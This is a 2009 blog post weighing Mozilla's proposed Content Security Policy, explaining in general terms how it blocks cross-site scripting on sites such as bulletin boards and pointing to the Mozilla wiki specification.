Mozilla CSP, Good or Bad?

In June of this year, Mozilla announced Content Security Policy (CSP) to help prevent Cross Site Scripting (XSS) attacks and if you just so happened never to read the blog. You can find it here. I admit, I am not and was not utterly thrilled by the proposal. Nevertheless you have to acknowledge the benefits of this proposal in user land, despite the additional work load it may or may not create in an effort to supply the appropriate headers to the web browser.

Now this was three months ago and we now can see the first previews of CSP available and you can find those here. You will find more information on the demo page about previewing CSP. Keep in mind that you will need a browser that supports CSP or all of the tests on the CSP demo page will fail. This obviously excludes Internet Explorer, Safari and Opera.

The CSP proposal is in no way a standard or at least not yet. I wouldn’t be surprised to see wide spread support among avid followers of Mozilla FireFox but essentially. For those of you who can’t be bothered to try and understand what the Content Security Policy (CSP) is or what it means to you. Read on and I will elaborate.

The Content Security Policy or what you now know as CSP is essentially just a policy that can be optionally defined on a site by site basis. You may visit site a and site b. Site a may not have CSP enabled but site b does and let us assume for a moment that site b is a Bulletin Board.

A user on site b attempts to embed malicious code through a Cross Site Scripting(XSS) exploit on site b that allows them to exploit your session by collecting the needed information on site a. With CSP enabled on site b, the external content that was embedded that collects the needed information to allow exploitation of your account is essentially blocked by your browser.

Now if your a little more web savvy and familiar with PHP. A good example of how you can enable CSP is by sending the following header from your application.

For more information on using the Content Security Policy specification you can look no further than the Mozilla wiki: https://wiki.mozilla.org/Security/CSP/Spec#Formal_Policy_Syntax

Posted on Tuesday, October 6th, 2009 at 11:33am under Category by admin.